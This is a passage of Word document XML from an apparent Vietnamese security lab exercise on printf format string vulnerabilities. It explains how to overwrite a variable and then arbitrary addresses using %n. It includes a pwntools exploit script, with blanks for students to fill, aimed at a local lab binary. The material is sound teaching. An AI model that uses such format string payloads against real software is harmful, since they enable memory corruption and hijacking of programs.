      <w:r>
        <w:t>Từ bước 2</w:t>
      </w:r>
      <w:r w:rsidR="00EE19EF">
        <w:t xml:space="preserve"> và 3</w:t>
      </w:r>
      <w:r>
        <w:t>, ta có địa chỉ của biến c tương ứng với vị trí tham số thứ k của hàm printf</w:t>
      </w:r>
      <w:r w:rsidR="00040210" w:rsidRPr="00040210">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> khi đó có thể tạo chuỗi định dạng như sau để </w:t>
      </w:r>
      <w:r w:rsidR="00F45BA6">
        <w:t>ghi đè lên vị trí biến c</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4138E0" w14:textId="1E5EF8C5" w:rsidR="002C7606" w:rsidRPr="00021C45" w:rsidRDefault="002C7606" w:rsidP="002C7606">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00021C45">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[addr of c</w:t>
      </w:r>
      <w:r w:rsidR="00573EC9" w:rsidRPr="00021C45">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>][additional format]</w:t>
      </w:r>
      <w:r w:rsidRPr="00021C45">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidR="00CD2053" w:rsidRPr="00021C45">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00021C45">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="00CD2053" w:rsidRPr="00021C45">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-1&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00021C45">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7987D5BB" w14:textId="5D77E9C1" w:rsidR="00674B55" w:rsidRDefault="00843C04" w:rsidP="00674B55">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Lưu ý ta cần gán c thành 16. </w:t>
      </w:r>
      <w:r w:rsidR="00385464">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Trong</w:t>
      </w:r>
      <w:r w:rsidR="002C7606">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> đó, số ký tự đã được in ra ở phần </w:t>
      </w:r>
      <w:r w:rsidR="002C7606" w:rsidRPr="00021C45">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[addr of c]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">là 4 byte (4 ký tự). Vậy muốn %n ghi được giá trị 16, ta cần additional format sẽ có tác dụng in 12 ký tự nữa. </w:t>
      </w:r>
      <w:r w:rsidRPr="00843C04">
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dùng chuỗi format nào để in được 12 ký tự?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEE209A" w14:textId="2E07904C" w:rsidR="00843C04" w:rsidRDefault="00843C04" w:rsidP="00843C04">
      <w:pPr>
        <w:pStyle w:val="Step"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="357" w:hanging="357"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Truyền chuỗi để ghi đè</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733781FB" w14:textId="34344603" w:rsidR="00843C04" w:rsidRPr="00843C04" w:rsidRDefault="00843C04" w:rsidP="00843C04">
      <w:pPr>
        <w:pStyle w:val="Step"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:left="357"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sinh viên tham khảo đoạn mã khai thác bên dưới.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9530"/>
      </w:tblGrid>
      <w:tr w:rsidR="00674B55" w14:paraId="200FA9FF" w14:textId="77777777" w:rsidTr="00674B55">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A8E05E7" w14:textId="4258F954" w:rsidR="003A0BFA" w:rsidRDefault="003A0BFA" w:rsidP="00843C04">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>from pwn import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1775E4BB" w14:textId="55E4834D" w:rsidR="00674B55" w:rsidRPr="00843C04" w:rsidRDefault="00674B55" w:rsidP="00843C04">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>def forc():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20D49C06" w14:textId="7EEAC754" w:rsidR="00674B55" w:rsidRDefault="00674B55" w:rsidP="00843C04">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    sh = process('./</w:t>
            </w:r>
            <w:r w:rsidR="00CF5EF0">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>app-</w:t>
            </w:r>
            <w:r w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>overwrite')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EDF198A" w14:textId="3301A97D" w:rsidR="005B61B3" w:rsidRPr="00F76F48" w:rsidRDefault="005B61B3" w:rsidP="00843C04">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00F76F48">
              <w:rPr>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># get address of c</w:t>
            </w:r>
            <w:r w:rsidR="00CF5EF0">
              <w:rPr>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> from the first output</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17724D9A" w14:textId="77777777" w:rsidR="00674B55" w:rsidRPr="00843C04" w:rsidRDefault="00674B55" w:rsidP="00843C04">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    c_addr = int(sh.recvuntil('\n', drop=True), 16)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1717C1FF" w14:textId="071D4F38" w:rsidR="00674B55" w:rsidRDefault="00674B55" w:rsidP="00843C04">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    print </w:t>
            </w:r>
            <w:r w:rsidR="00416C8D" w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00463048" w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidR="00463048">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>- Address of c: %s</w:t>
            </w:r>
            <w:r w:rsidR="00463048" w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidR="00463048">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> % </w:t>
            </w:r>
            <w:r w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>hex(c_addr)</w:t>
            </w:r>
            <w:r w:rsidR="00416C8D" w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0489B8DB" w14:textId="5D0ECDFD" w:rsidR="00F76F48" w:rsidRPr="00F76F48" w:rsidRDefault="00F76F48" w:rsidP="00843C04">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00F76F48">
              <w:rPr>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># additional format</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> – change to your format</w:t>
            </w:r>
            <w:r w:rsidR="001B2A63">
              <w:rPr>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> to create 12 characters</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="465C5B93" w14:textId="3FA48C52" w:rsidR="00F76F48" w:rsidRDefault="00F76F48" w:rsidP="00843C04">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    additional_format = </w:t>
            </w:r>
            <w:r w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>b'</w:t>
            </w:r>
            <w:r w:rsidRPr="00F76F48">
              <w:rPr>
                <w:color w:val="C00000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>%p%p</w:t>
            </w:r>
            <w:r w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26A80E64" w14:textId="69BE7857" w:rsidR="0079502F" w:rsidRDefault="0079502F" w:rsidP="00843C04">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00F76F48">
              <w:rPr>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>overwrite offset – change to your format</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37AC4325" w14:textId="3303F337" w:rsidR="00F76F48" w:rsidRPr="00843C04" w:rsidRDefault="00F76F48" w:rsidP="00843C04">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    overw</w:t>
            </w:r>
            <w:r w:rsidR="00BF1626">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>r</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">ite_offset = </w:t>
            </w:r>
            <w:r w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>b'%</w:t>
            </w:r>
            <w:r w:rsidRPr="00F76F48">
              <w:rPr>
                <w:color w:val="C00000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>k</w:t>
            </w:r>
            <w:r w:rsidR="006F4E07">
              <w:rPr>
                <w:color w:val="C00000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-1</w:t>
            </w:r>
            <w:r w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$n'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="057A1E32" w14:textId="75C9EB49" w:rsidR="00674B55" w:rsidRPr="00843C04" w:rsidRDefault="00674B55" w:rsidP="00843C04">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    payload = p32(c_addr) + </w:t>
            </w:r>
            <w:r w:rsidR="00F76F48">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>additional_format + overwrite_offset</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38E50D60" w14:textId="2597EF7A" w:rsidR="00674B55" w:rsidRPr="00843C04" w:rsidRDefault="00674B55" w:rsidP="00843C04">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    print </w:t>
            </w:r>
            <w:r w:rsidR="00416C8D" w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="009F1F2C" w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidR="009F1F2C">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>- Your payload: %s</w:t>
            </w:r>
            <w:r w:rsidR="009F1F2C" w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidR="009F1F2C">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> % </w:t>
            </w:r>
            <w:r w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>payload</w:t>
            </w:r>
            <w:r w:rsidR="00416C8D" w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A6178A8" w14:textId="77777777" w:rsidR="00952818" w:rsidRDefault="00674B55" w:rsidP="00843C04">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    sh.sendline(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D905986" w14:textId="78BD89EE" w:rsidR="00674B55" w:rsidRPr="00843C04" w:rsidRDefault="00674B55" w:rsidP="00843C04">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    sh.interactive()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DDC1B4A" w14:textId="65C72BFD" w:rsidR="00674B55" w:rsidRDefault="00674B55" w:rsidP="00843C04">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00843C04">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>forc()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FCFE345" w14:textId="79671D8C" w:rsidR="00841655" w:rsidRDefault="00841655" w:rsidP="00841655">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:spacing w:before="120"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả chạy code khai thác</w:t>
      </w:r>
      <w:r w:rsidR="001803B9">
        <w:t xml:space="preserve"> như bên dưới là thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AD118C" w14:textId="37A7CA92" w:rsidR="001803B9" w:rsidRDefault="00264C13" w:rsidP="001803B9">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B131CBB" wp14:editId="6D223EDB">
            <wp:extent cx="4299668" cy="1862287"/>
            <wp:effectExtent l="0" t="0" r="5715" b="508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40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4322439" cy="1872149"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AF085C" w14:textId="30DA8952" w:rsidR="006043F9" w:rsidRPr="00774A08" w:rsidRDefault="009340E3" w:rsidP="00EF74F8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00423B5A">
        <w:t xml:space="preserve">Ghi đè </w:t>
      </w:r>
      <w:r w:rsidR="00B8054D">
        <w:t>tại địa chỉ</w:t>
      </w:r>
      <w:r w:rsidRPr="00423B5A">
        <w:t xml:space="preserve"> tùy ý </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FEC694" w14:textId="69FDEC2D" w:rsidR="00601631" w:rsidRPr="00FD482B" w:rsidRDefault="000866EA" w:rsidP="00FD482B">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t>Có</w:t>
      </w:r>
      <w:r w:rsidR="00B8054D">
        <w:t xml:space="preserve"> thể để ý rằng với cách ghi đè ở trên với overwrite addr nằm ở đầu chuỗi định dạng dùng để khai thác, giá trị ghi đè với %n sẽ luôn lớn hơn 4, do luôn có phần overwrite addr chiếm 4 byte (hoặc 8 byte)</w:t>
      </w:r>
      <w:r w:rsidR="00601631" w:rsidRPr="00FD482B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B8054D">
        <w:t xml:space="preserve"> Vậy làm thế nào ghi đè giá trị nhỏ hơn như 1, 2, hay 3?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18677C22" w14:textId="55BF62A7" w:rsidR="00C611D4" w:rsidRDefault="00B8054D" w:rsidP="00A04CA8">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Để làm được điều này, ý tưởng là không cần đặt địa chỉ cần ghi đè ở đầu chuỗi.</w:t>
      </w:r>
      <w:r w:rsidR="00A04CA8">
        <w:t xml:space="preserve"> Ta có thể đặt địa chỉ này ở giữa hoặc cuối chuỗi, miễn sao phần overwrite offset được điều chỉnh để printf sử dụng đúng được địa chỉ đó làm tham số cho %n. Khi đó, công việc còn lại là phần additional format có thể in ra số lượng ký tự bằng đúng giá trị muốn ghi đè</w:t>
      </w:r>
      <w:r w:rsidR="00C17E07">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E663D6">
        <w:t xml:space="preserve"> Padding để đẩy overwrite addr đến vị trí thích hợp, thường là địa chỉ chia hết cho 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC14F8E" w14:textId="1C9D4C96" w:rsidR="00C611D4" w:rsidRPr="00021C45" w:rsidRDefault="00C611D4" w:rsidP="00C611D4">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00021C45">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[additional format]%&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00C17E07">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00021C45">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-1&gt;$n</w:t>
      </w:r>
      <w:r w:rsidR="00BD5B83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[padding]</w:t>
      </w:r>
      <w:r w:rsidRPr="00021C45">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
